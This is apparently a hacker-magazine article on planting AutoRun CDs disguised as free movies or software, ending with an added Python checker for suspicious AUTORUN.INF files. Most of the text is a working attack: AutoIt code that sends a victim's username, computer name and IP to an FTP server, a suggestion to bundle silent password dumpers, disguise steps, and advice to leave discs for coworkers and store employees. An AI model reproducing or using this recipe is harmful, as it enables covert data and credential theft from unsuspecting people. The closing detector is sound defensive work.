Pirating the Caribbean

by Rob

In my previous article "iPod Sneakiness" (23:1), I described how to use an iPod to retrieve a local user's information.

This article was picked up by Hak5 and has evolved into the USB Switchblade and USB Hacksaw.

They have really expanded on the original concept, so if it is something that interests you, I suggest you go check it out.

Now on to bigger and better things.  With the iPod, you had to be on a local user's machine.  What if we could get that same info without ever touching a PC?  Let's see how this might work...

First off, buy a few blank CDs.  Total cost: about ten bucks.

Now, using the methods we talked about in the previous article, let's put together a script in AutoIt (or your favorite scripting language) that will gather local user info and upload it to an FTP server.

The example below is fairly benign.  It gathers usernames, IPs, and PC names:

; Gather the local details with AutoIt's built-in macros.
$Computername = @ComputerName
$Username = @UserName
$Month = @MON
$Date = @MDAY
$Year = @YEAR
$Hour = @HOUR
$Minute = @MIN
$IP = @IPAddress1

$file = FileOpen("ftp://yourserver/folderwithonlywritepermissions/readme.txt", 1)

If $file = -1 Then
  MsgBox(0, "Error", "Unable to open file.")
  Exit
EndIf

FileWriteLine($file, 'Computername = ' & $Computername)
FileWriteLine($file, 'Username = ' & $Username)
FileWriteLine($file, 'Date = ' & $Month & '/' & $Date & '/' & $Year)
FileWriteLine($file, 'Time = ' & $Hour & ':' & $Minute)
FileWriteLine($file, 'IP = ' & $IP)
FileWriteLine($file, '----------')
FileWriteLine($file, ' ')
FileClose($file)

Add in some of the Nirsoft password gathering programs we talked about before to run silently and dump results, and you are in good shape.

So now we have the hacking part done, but how do we get someone to run this for us?  Here comes the social engineering part.

Compile your AutoIt script into an .EXE named "PLAY.EXE" and give it the icon of an AVI or MOV file.

Next, go download a few pictures from Google Images of a popular movie.  Let's use Pirates of the Caribbean as an example.  I would download the movie poster, and an icon (ICO) file.  The movie poster is just for authenticity, and the icon is for later.

Now, create an AutoRun file.  It's basically a text file with an .INF extension.  An example is below:

[autorun]
label=Pirates Of The Caribbean
icon=POTC.ICO
open=PLAY.EXE

Almost done.  Now go to IMDb and look up your movie.  Copy the description and paste it into a text document named README.  Once again, this is all for authenticity.

Create one more text document and name it data.  Take away the extension so it's a generic Windows icon.  (Authenticity yet again...)

Take all the files:

  1. PLAY.EXE - Your script
  2. MOVIEPOSTER.JPG - Your poster image
  3. POTC.ICO - Your icon file
  4. AUTORUN.INF - Your autorun
  5. Data - Your renamed text file

and burn them on the root of a CD.  Heck, burn them to about twenty CDs while you're at it.  Take your burned CD and write "Pirates of the Caribbean" on it with a Sharpie.

Grab your stack o' CDs and distribute them strategically.  Think about the places you can put them.  Maybe throw one in the bathroom at work and grab some coworker's information.  How about dropping one outside your local Best Buy for the random factor?  Heck, drop a few in Best Buy - maybe by a cash register - and see if you can get some employee's info.  Who can resist putting a burned CD into their PC, especially when they think they've found something free?

Don't limit this to movies.  Label a CD "Windows 7 Ultimate Upgrade" and download the appropriate icons to target the geekier among us.  The ideas are endless.

Warning - Responsible message follows:  If you are an IT person, you should probably disable AutoRun on all of your PCs as a matter of policy.  It will diminish the chances of this type of attack working, and it's just good common sense.  Enjoy.
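Disabling AutoRun is the policy fix; a defender can also look at what a disc would do before trusting it.  The following Python check is an added example, not code from the article: it parses an AUTORUN.INF taken from untrusted media and reports what Windows would launch, flagging the pattern described above, where the label and icon say "movie" but insertion runs an executable.  The INF contents in it are constructed samples.

```python
import configparser

# Constructed samples (not from the article): the disc the text describes, and a
# label-only disc that launches nothing.
DROPPED_DISC = "[autorun]\nlabel=Pirates Of The Caribbean\nicon=POTC.ICO\nopen=PLAY.EXE\n"
LABEL_ONLY = "[AutoRun]\nlabel=Vacation Photos\nicon=photos.ico\n"

# Keys that make Windows run something on insertion or on double-clicking the drive.
LAUNCH_KEYS = ("open", "shellexecute")
EXEC_EXTS = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".js", ".hta")

def parse_autorun(text):
    """Return the [autorun] section (name matched case-insensitively) as a dict."""
    cp = configparser.RawConfigParser(strict=False, interpolation=None)
    cp.read_string(text)
    for name in cp.sections():
        if name.lower() == "autorun":
            return dict(cp.items(name))  # RawConfigParser lowercases the keys
    return {}

def program_of(command):
    """First token of a command line, honouring a quoted program path."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    parts = command.split()
    return parts[0] if parts else ""

def launch_targets(section):
    """Programs launched via open=, shellexecute= or shell\\<verb>\\command=."""
    targets = []
    for key, value in section.items():
        if key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command")):
            targets.append(program_of(value))
    return targets

def assess(text):
    """Verdict plus launched programs. 'launches_executable' is the article's pattern:
    a media-looking label and icon, but insertion runs a program on the disc."""
    targets = launch_targets(parse_autorun(text))
    if not targets:
        return "benign", []
    if any(t.lower().endswith(EXEC_EXTS) for t in targets):
        return "launches_executable", targets
    return "launches_other", targets
```

Run `assess()` over the AUTORUN.INF from any found disc or stick before opening anything else on it; a "launches_executable" verdict on media that claims to be a movie or photos is the tell.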

Code: PLAY.au3